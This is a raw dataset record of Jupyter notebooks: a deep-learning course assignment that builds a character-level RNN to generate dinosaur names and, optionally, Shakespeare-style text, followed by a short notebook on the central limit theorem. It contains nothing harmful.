"- **Step 3**: Sampling: \n - Now that we have $y^{\\langle t+1 \\rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter. To make the results more interesting, we will use np.random.choice to select a next letter that is *likely*, but not always the same.\n - Pick the next character's **index** according to the probability distribution specified by $\\hat{y}^{\\langle t+1 \\rangle }$. \n - This means that if $\\hat{y}^{\\langle t+1 \\rangle }_i = 0.16$, you will pick the index \"i\" with 16% probability. \n - Use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).\n\n Example of how to use `np.random.choice()`:\n ```python\n np.random.seed(0)\n probs = np.array([0.1, 0.0, 0.7, 0.2])\n idx = np.random.choice(range(len((probs)), p = probs)\n ```\n \n - This means that you will pick the index (`idx`) according to the distribution: \n\n $P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.\n\n - Note that the value that's set to `p` should be set to a 1D vector.\n - Also notice that $\\hat{y}^{\\langle t+1 \\rangle}$, which is `y` in the code, is a 2D array.\n - Also notice, while in your implementation, the first argument to np.random.choice is just an ordered list [0,1,.., vocab_len-1], it is *Not* appropriate to use char_to_ix.values(). The *order* of values returned by a python dictionary .values() call will be the same order as they are added to the dictionary. The grader may have a different order when it runs your routine than when you run it in your notebook.",
"_____no_output_____"
],
[
"##### Additional Hints\n- [range](https://docs.python.org/3/library/functions.html#func-range)\n- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.\n```Python\narr = np.array([[1,2],[3,4]])\nprint(\"arr\")\nprint(arr)\nprint(\"arr.ravel()\")\nprint(arr.ravel())\n```\nOutput:\n```Python\narr\n[[1 2]\n [3 4]]\narr.ravel()\n[1 2 3 4]\n```\n\n- Note that `append` is an \"in-place\" operation. In other words, don't do this:\n```Python\nfun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want\n```",
"_____no_output_____"
],
[
"- **Step 4**: Update to $x^{\\langle t \\rangle }$ \n - The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\\langle t \\rangle }$, with the value of $x^{\\langle t + 1 \\rangle }$. \n - You will represent $x^{\\langle t + 1 \\rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction. \n - You will then forward propagate $x^{\\langle t + 1 \\rangle }$ in Step 1 and keep repeating the process until you get a \"\\n\" character, indicating that you have reached the end of the dinosaur name. ",
"_____no_output_____"
],
[
"##### Additional Hints\n- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.\n - You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)\n - Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: sample\n\ndef sample(parameters, char_to_ix, seed):\n \"\"\"\n Sample a sequence of characters according to a sequence of probability distributions output of the RNN\n\n Arguments:\n parameters -- python dictionary containing the parameters Waa, Wax, Wya, by, and b. \n char_to_ix -- python dictionary mapping each character to an index.\n seed -- used for grading purposes. Do not worry about it.\n\n Returns:\n indices -- a list of length n containing the indices of the sampled characters.\n \"\"\"\n \n # Retrieve parameters and relevant shapes from \"parameters\" dictionary\n Waa, Wax, Wya, by, b = parameters['Waa'], parameters['Wax'], parameters['Wya'], parameters['by'], parameters['b']\n vocab_size = by.shape[0]\n n_a = Waa.shape[1]\n \n ### START CODE HERE ###\n # Step 1: Create the a zero vector x that can be used as the one-hot vector \n # representing the first character (initializing the sequence generation). (≈1 line)\n x = np.zeros(( vocab_size, 1))\n # Step 1': Initialize a_prev as zeros (≈1 line)\n a_prev = np.zeros(( n_a, 1))\n \n # Create an empty list of indices, this is the list which will contain the list of indices of the characters to generate (≈1 line)\n indices = []\n \n # idx is the index of the one-hot vector x that is set to 1\n # All other positions in x are zero.\n # We will initialize idx to -1\n idx = -1 \n \n # Loop over time-steps t. At each time-step:\n # sample a character from a probability distribution \n # and append its index (`idx`) to the list \"indices\". \n # We'll stop if we reach 50 characters \n # (which should be very unlikely with a well trained model).\n # Setting the maximum number of characters helps with debugging and prevents infinite loops. \n counter = 0\n newline_character = char_to_ix['\\n']\n \n while (idx != newline_character and counter != 50):\n \n # Step 2: Forward propagate x using the equations (1), (2) and (3)\n a = np.tanh( np.dot(Waa, a_prev) + np.dot(Wax, x) + b)\n z = np.dot(Wya, a) + by\n y = softmax(z)\n \n # for grading purposes\n np.random.seed(counter+seed) \n \n # Step 3: Sample the index of a character within the vocabulary from the probability distribution y\n # (see additional hints above)\n idx = np.random.choice(range(vocab_size), p = y.ravel())\n\n # Append the index to \"indices\"\n indices.append(idx)\n \n # Step 4: Overwrite the input x with one that corresponds to the sampled index `idx`.\n # (see additional hints above)\n x = np.zeros(( vocab_size, 1))\n x[idx,:] = 1\n \n # Update \"a_prev\" to be \"a\"\n a_prev = a\n \n # for grading purposes\n seed += 1\n counter +=1\n \n ### END CODE HERE ###\n\n if (counter == 50):\n indices.append(char_to_ix['\\n'])\n \n return indices",
"_____no_output_____"
],
[
"np.random.seed(2)\n_, n_a = 20, 100\nWax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)\nb, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"b\": b, \"by\": by}\n\n\nindices = sample(parameters, char_to_ix, 0)\nprint(\"Sampling:\")\nprint(\"list of sampled indices:\\n\", indices)\nprint(\"list of sampled characters:\\n\", [ix_to_char[i] for i in indices])",
"Sampling:\nlist of sampled indices:\n [12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]\nlist of sampled characters:\n ['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\\n']\n"
]
],
[
[
"** Expected output:**\n\n```Python\nSampling:\nlist of sampled indices:\n [12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]\nlist of sampled characters:\n ['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\\n']\n```\n",
"_____no_output_____"
],
[
"## 3 - Building the language model \n\nIt is time to build the character-level language model for text generation. \n\n\n### 3.1 - Gradient descent \n\n* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients). \n* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent. \n\nAs a reminder, here are the steps of a common optimization loop for an RNN:\n\n- Forward propagate through the RNN to compute the loss\n- Backward propagate through time to compute the gradients of the loss with respect to the parameters\n- Clip the gradients\n- Update the parameters using gradient descent \n\n**Exercise**: Implement the optimization process (one step of stochastic gradient descent). \n\nThe following functions are provided:\n\n```python\ndef rnn_forward(X, Y, a_prev, parameters):\n \"\"\" Performs the forward propagation through the RNN and computes the cross-entropy loss.\n It returns the loss' value as well as a \"cache\" storing values to be used in backpropagation.\"\"\"\n ....\n return loss, cache\n \ndef rnn_backward(X, Y, parameters, cache):\n \"\"\" Performs the backward propagation through time to compute the gradients of the loss with respect\n to the parameters. It returns also all the hidden states.\"\"\"\n ...\n return gradients, a\n\ndef update_parameters(parameters, gradients, learning_rate):\n \"\"\" Updates parameters using the Gradient Descent Update Rule.\"\"\"\n ...\n return parameters\n```\n\nRecall that you previously implemented the `clip` function:\n\n",
"_____no_output_____"
],
[
"#### parameters\n\n* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.\n* Python dictionaries and lists are \"pass by reference\", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: optimize\n\ndef optimize(X, Y, a_prev, parameters, learning_rate = 0.01):\n \"\"\"\n Execute one step of the optimization to train the model.\n \n Arguments:\n X -- list of integers, where each integer is a number that maps to a character in the vocabulary.\n Y -- list of integers, exactly the same as X but shifted one index to the left.\n a_prev -- previous hidden state.\n parameters -- python dictionary containing:\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n b -- Bias, numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n learning_rate -- learning rate for the model.\n \n Returns:\n loss -- value of the loss function (cross-entropy)\n gradients -- python dictionary containing:\n dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)\n dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)\n dWya -- Gradients of hidden-to-output weights, of shape (n_y, n_a)\n db -- Gradients of bias vector, of shape (n_a, 1)\n dby -- Gradients of output bias vector, of shape (n_y, 1)\n a[len(X)-1] -- the last hidden state, of shape (n_a, 1)\n \"\"\"\n \n ### START CODE HERE ###\n \n # Forward propagate through time (≈1 line)\n loss, cache = rnn_forward(X, Y, a_prev, parameters)\n \n # Backpropagate through time (≈1 line)\n gradients, a = rnn_backward(X, Y, parameters, cache)\n \n # Clip your gradients between -5 (min) and 5 (max) (≈1 line)\n gradients = clip(gradients, 5)\n \n # Update parameters (≈1 line)\n parameters = update_parameters(parameters, gradients, learning_rate)\n \n ### END CODE HERE ###\n \n return loss, gradients, a[len(X)-1]",
"_____no_output_____"
],
[
"np.random.seed(1)\nvocab_size, n_a = 27, 100\na_prev = np.random.randn(n_a, 1)\nWax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)\nb, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"b\": b, \"by\": by}\nX = [12,3,5,11,22,3]\nY = [4,14,11,22,25, 26]\n\nloss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)\nprint(\"Loss =\", loss)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"np.argmax(gradients[\\\"dWax\\\"]) =\", np.argmax(gradients[\"dWax\"]))\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])\nprint(\"a_last[4] =\", a_last[4])",
"Loss = 126.503975722\ngradients[\"dWaa\"][1][2] = 0.194709315347\nnp.argmax(gradients[\"dWax\"]) = 93\ngradients[\"dWya\"][1][2] = -0.007773876032\ngradients[\"db\"][4] = [-0.06809825]\ngradients[\"dby\"][1] = [ 0.01538192]\na_last[4] = [-1.]\n"
]
],
[
[
"** Expected output:**\n\n```Python\nLoss = 126.503975722\ngradients[\"dWaa\"][1][2] = 0.194709315347\nnp.argmax(gradients[\"dWax\"]) = 93\ngradients[\"dWya\"][1][2] = -0.007773876032\ngradients[\"db\"][4] = [-0.06809825]\ngradients[\"dby\"][1] = [ 0.01538192]\na_last[4] = [-1.]\n```",
"_____no_output_____"
],
[
"### 3.2 - Training the model ",
"_____no_output_____"
],
[
"* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example. \n* Every 2000 steps of stochastic gradient descent, you will sample several randomly chosen names to see how the algorithm is doing. \n \n\n**Exercise**: Follow the instructions and implement `model()`. When `examples[index]` contains one dinosaur name (string), to create an example (X, Y), you can use this:\n\n##### Set the index `idx` into the list of examples\n* Using the for-loop, walk through the shuffled list of dinosaur names in the list \"examples\".\n* For example, if there are n_e examples, and the for-loop increments the index to n_e onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is n_e, n_e + 1, etc.\n* Hint: n_e + 1 divided by n_e is zero with a remainder of 1.\n* `%` is the modulus operator in python.\n\n##### Extract a single example from the list of examples\n* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.",
"_____no_output_____"
],
[
"##### Convert a string into a list of characters: `single_example_chars`\n* `single_example_chars`: A string is a list of characters.\n* You can use a list comprehension (recommended over for-loops) to generate a list of characters.\n```Python\nstr = 'I love learning'\nlist_of_chars = [c for c in str]\nprint(list_of_chars)\n```\n\n```\n['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']\n```",
"_____no_output_____"
],
[
"##### Convert list of characters to a list of integers: `single_example_ix`\n* Create a list that contains the index numbers associated with each character.\n* Use the dictionary `char_to_ix`\n* You can combine this with the list comprehension that is used to get a list of characters from a string.",
"_____no_output_____"
],
[
"##### Create the list of input characters: `X`\n* `rnn_forward` uses the **`None`** value as a flag to set the input vector as a zero-vector.\n* Prepend the list [**`None`**] in front of the list of input characters.\n* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`",
"_____no_output_____"
],
[
"##### Get the integer representation of the newline character `ix_newline`\n* `ix_newline`: The newline character signals the end of the dinosaur name.\n - get the integer representation of the newline character `'\\n'`.\n - Use `char_to_ix`",
"_____no_output_____"
],
[
"##### Set the list of labels (integer representation of the characters): `Y`\n* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.\n - For example, `Y[0]` contains the same value as `X[1]` \n* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels. \n - Append the integer representation of the newline character to the end of `Y`.\n - Note that `append` is an in-place operation.\n - It might be easier for you to add two lists together.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: model\n\ndef model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27, verbose = False):\n \"\"\"\n Trains the model and generates dinosaur names. \n \n Arguments:\n data -- text corpus\n ix_to_char -- dictionary that maps the index to a character\n char_to_ix -- dictionary that maps a character to an index\n num_iterations -- number of iterations to train the model for\n n_a -- number of units of the RNN cell\n dino_names -- number of dinosaur names you want to sample at each iteration. \n vocab_size -- number of unique characters found in the text (size of the vocabulary)\n \n Returns:\n parameters -- learned parameters\n \"\"\"\n \n # Retrieve n_x and n_y from vocab_size\n n_x, n_y = vocab_size, vocab_size\n \n # Initialize parameters\n parameters = initialize_parameters(n_a, n_x, n_y)\n \n # Initialize loss (this is required because we want to smooth our loss)\n loss = get_initial_loss(vocab_size, dino_names)\n \n # Build list of all dinosaur names (training examples).\n with open(\"dinos.txt\") as f:\n examples = f.readlines()\n examples = [x.lower().strip() for x in examples]\n \n # Shuffle list of all dinosaur names\n np.random.seed(0)\n np.random.shuffle(examples)\n \n # Initialize the hidden state of your LSTM\n a_prev = np.zeros((n_a, 1))\n \n # Optimization loop\n for j in range(num_iterations):\n \n ### START CODE HERE ###\n \n # Set the index `idx` (see instructions above)\n idx = j % len(examples)\n \n # Set the input X (see instructions above)\n single_example = examples[idx]\n single_example_chars = [c for c in single_example]\n single_example_ix = [char_to_ix[c] for c in single_example_chars]\n X = [None]+[single_example_ix]\n X = [None]+[char_to_ix[ch] for ch in examples[idx]]; \n # Set the labels Y (see instructions above)\n ix_newline = char_to_ix[\"\\n\"]\n Y = X[1:]+[ix_newline]\n\n # Perform one optimization step: Forward-prop -> Backward-prop -> Clip -> Update parameters\n # Choose a learning rate of 0.01\n curr_loss, gradients, a_prev = optimize(X, Y, a_prev, parameters, learning_rate=0.01)\n \n ### END CODE HERE ###\n \n # debug statements to aid in correctly forming X, Y\n if verbose and j in [0, len(examples) -1, len(examples)]:\n print(\"j = \" , j, \"idx = \", idx,) \n if verbose and j in [0]:\n print(\"single_example =\", single_example)\n print(\"single_example_chars\", single_example_chars)\n print(\"single_example_ix\", single_example_ix)\n print(\" X = \", X, \"\\n\", \"Y = \", Y, \"\\n\")\n \n # Use a latency trick to keep the loss smooth. It happens here to accelerate the training.\n loss = smooth(loss, curr_loss)\n\n # Every 2000 Iteration, generate \"n\" characters thanks to sample() to check if the model is learning properly\n if j % 2000 == 0:\n \n print('Iteration: %d, Loss: %f' % (j, loss) + '\\n')\n \n # The number of dinosaur names to print\n seed = 0\n for name in range(dino_names):\n \n # Sample indices and print them\n sampled_indices = sample(parameters, char_to_ix, seed)\n print_sample(sampled_indices, ix_to_char)\n \n seed += 1 # To get the same result (for grading purposes), increment the seed by one. \n \n print('\\n')\n \n return parameters",
"_____no_output_____"
]
],
[
[
"Run the following cell, you should observe your model outputting random-looking characters at the first iteration. After a few thousand iterations, your model should learn to generate reasonable-looking names. ",
"_____no_output_____"
]
],
[
[
"parameters = model(data, ix_to_char, char_to_ix, verbose = True)",
"j = 0 idx = 0\nsingle_example = turiasaurus\nsingle_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']\nsingle_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]\n X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19] \n Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0] \n\nIteration: 0, Loss: 23.087336\n\nNkzxwtdmfqoeyhsqwasjkjvu\nKneb\nKzxwtdmfqoeyhsqwasjkjvu\nNeb\nZxwtdmfqoeyhsqwasjkjvu\nEb\nXwtdmfqoeyhsqwasjkjvu\n\n\nj = 1535 idx = 1535\nj = 1536 idx = 0\nIteration: 2000, Loss: 27.884160\n\nLiusskeomnolxeros\nHmdaairus\nHytroligoraurus\nLecalosapaus\nXusicikoraurus\nAbalpsamantisaurus\nTpraneronxeros\n\n\nIteration: 4000, Loss: 25.901815\n\nMivrosaurus\nInee\nIvtroplisaurus\nMbaaisaurus\nWusichisaurus\nCabaselachus\nToraperlethosdarenitochusthiamamumamaon\n\n\nIteration: 6000, Loss: 24.608779\n\nOnwusceomosaurus\nLieeaerosaurus\nLxussaurus\nOma\nXusteonosaurus\nEeahosaurus\nToreonosaurus\n\n\nIteration: 8000, Loss: 24.070350\n\nOnxusichepriuon\nKilabersaurus\nLutrodon\nOmaaerosaurus\nXutrcheps\nEdaksoje\nTrodiktonus\n\n\nIteration: 10000, Loss: 23.844446\n\nOnyusaurus\nKlecalosaurus\nLustodon\nOla\nXusodonia\nEeaeosaurus\nTroceosaurus\n\n\nIteration: 12000, Loss: 23.291971\n\nOnyxosaurus\nKica\nLustrepiosaurus\nOlaagrraiansaurus\nYuspangosaurus\nEealosaurus\nTrognesaurus\n\n\nIteration: 14000, Loss: 23.382338\n\nMeutromodromurus\nInda\nIutroinatorsaurus\nMaca\nYusteratoptititan\nCa\nTroclosaurus\n\n\nIteration: 16000, Loss: 23.255630\n\nMeustolkanolus\nIndabestacarospceryradwalosaurus\nJustolopinaveraterasauracoptelalenyden\nMaca\nYusocles\nDaahosaurus\nTrodon\n\n\nIteration: 18000, Loss: 22.905483\n\nPhytronn\nMeicanstolanthus\nMustrisaurus\nPegalosaurus\nYuskercis\nEgalosaurus\nTromelosaurus\n\n\nIteration: 20000, Loss: 22.873854\n\nNlyushanerohyisaurus\nLoga\nLustrhigosaurus\nNedalosaurus\nYuslangosaurus\nElagosaurus\nTrrangosaurus\n\n\nIteration: 22000, Loss: 22.710545\n\nOnyxromicoraurospareiosatrus\nLiga\nMustoffankeugoptardoros\nOla\nYusodogongterosaurus\nEhaerona\nTrododongxernochenhus\n\n\nIteration: 24000, Loss: 22.604827\n\nMeustognathiterhucoplithaloptha\nJigaadosaurus\nKurrodon\nMecaistheansaurus\nYuromelosaurus\nEiaeropeeton\nTroenathiteritaus\n\n\nIteration: 26000, Loss: 22.714486\n\nNhyxosaurus\nKola\nLvrosaurus\nNecalosaurus\nYurolonlus\nEjakosaurus\nTroindronykus\n\n\nIteration: 28000, Loss: 22.647640\n\nOnyxosaurus\nLoceahosaurus\nLustleonlonx\nOlabasicachudrakhurgawamosaurus\nYtrojianiisaurus\nEladon\nTromacimathoshargicitan\n\n\nIteration: 30000, Loss: 22.598485\n\nOryuton\nLocaaesaurus\nLustoendosaurus\nOlaahus\nYusaurus\nEhadopldarshuellus\nTroia\n\n\nIteration: 32000, Loss: 22.211861\n\nMeutronlapsaurus\nKracallthcaps\nLustrathus\nMacairugeanosaurus\nYusidoneraverataus\nEialosaurus\nTroimaniathonsaurus\n\n\nIteration: 34000, Loss: 22.447230\n\nOnyxipaledisons\nKiabaeropa\nLussiamang\nPacaeptabalsaurus\nXosalong\nEiacoteg\nTroia\n\n\n"
]
],
[
[
"** Expected Output**\n\n```Python\nj = 0 idx = 0\nsingle_example = turiasaurus\nsingle_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']\nsingle_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]\n X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19] \n Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0] \n\nIteration: 0, Loss: 23.087336\n\nNkzxwtdmfqoeyhsqwasjkjvu\nKneb\nKzxwtdmfqoeyhsqwasjkjvu\nNeb\nZxwtdmfqoeyhsqwasjkjvu\nEb\nXwtdmfqoeyhsqwasjkjvu\n\n\nj = 1535 idx = 1535\nj = 1536 idx = 0\nIteration: 2000, Loss: 27.884160\n\n...\n\nIteration: 34000, Loss: 22.447230\n\nOnyxipaledisons\nKiabaeropa\nLussiamang\nPacaeptabalsaurus\nXosalong\nEiacoteg\nTroia\n```",
"_____no_output_____"
],
[
"## Conclusion\n\nYou can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.\n\nIf your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest! \n\nThis assignment had used a relatively small dataset, so that you could train an RNN quickly on a CPU. Training a model of the english language requires a much bigger dataset, and usually needs much more computation, and could run for many hours on GPUs. We ran our dinosaur name for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!\n\n<img src=\"images/mangosaurus.jpeg\" style=\"width:250;height:300px;\">",
"_____no_output_____"
],
[
"## 4 - Writing like Shakespeare\n\nThe rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative. \n\nA similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of Dinosaur names you can use a collection of Shakespearian poems. Using LSTM cells, you can learn longer term dependencies that span many characters in the text--e.g., where a character appearing somewhere a sequence can influence what should be a different character much much later in the sequence. These long term dependencies were less important with dinosaur names, since the names were quite short. \n\n\n<img src=\"images/shakespeare.jpg\" style=\"width:500;height:400px;\">\n<caption><center> Let's become poets! </center></caption>\n\nWe have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes. ",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\nfrom shakespeare_utils import *\nimport sys\nimport io",
"Using TensorFlow backend.\n"
]
],
[
[
"To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*\"The Sonnets\"*](shakespeare.txt). ",
"_____no_output_____"
],
[
"Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt asking you for an input (`<`40 characters). The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try \"Forsooth this maketh no sense \" (don't enter the quotation marks). Depending on whether you include the space at the end, your results might also differ--try it both ways, and try other inputs as well. \n",
"_____no_output_____"
]
],
[
[
"print_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\nmodel.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])",
"Epoch 1/1\n 1408/31412 [>.............................] - ETA: 317s - loss: 3.5865"
],
[
"# Run this cell to try with different inputs without having to re-train the model \ngenerate_output()",
"_____no_output_____"
]
],
[
[
"The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:\n- LSTMs instead of the basic RNN to capture longer-range dependencies\n- The model is a deeper, stacked LSTM model (2 layer)\n- Using Keras instead of python to simplify the code \n\nIf you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.\n\nCongratulations on finishing this notebook! ",
"_____no_output_____"
],
[
"**References**:\n- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).\n- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb01e8bbd051e11d917990effd50bd35958b33f9 | 15,864 | ipynb | Jupyter Notebook | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | Part 3 Descriptive Statistics/Study materials/08-sampling-distributions/08_Sampling Distributions/Sampling Distributions - 19 - Central Limit Theorem - Part II.ipynb | bimarsha7/Data-analysis | a748a08aaef1c347021dffd3dea572e4b6c1bc39 | [
"MIT"
] | null | null | null | 139.157895 | 7,264 | 0.892083 | [
[
[
"### Central Limit Theorem - Part II\n\nWork through the questions and use the created variables to answer the questions that follow below the notebook.\n\nRun the below cell to get started.\n",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n\n%matplotlib inline\nnp.random.seed(42)\n\npop_data = np.random.gamma(1,100,3000)\nplt.hist(pop_data);",
"_____no_output_____"
]
],
[
[
"`1.` In order to create the sampling distribution for the average of 100 draws of this distribution, follow these steps:\n\n`a.` Use numpy's **random.choice** to simulate 100 draws from the `pop_data` array. <br><br>\n`b.` Compute the mean of these 100 draws. <br><br>\n`c.` Write a loop to simulate this process 10,000 times, and store each mean into an array called **means_size_100**.<br><br>\n`d.` Plot a histogram of your sample means.<br><br>\n`e.` Use **means_size_100** and **pop_data** to answer the quiz questions below.",
"_____no_output_____"
]
],
[
[
"means_size_100 = []\nfor _ in range(10000):\n sample = np.random.choice(pop_data, 100)\n means_size_100.append(sample.mean())\n \nplt.hist(means_size_100);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
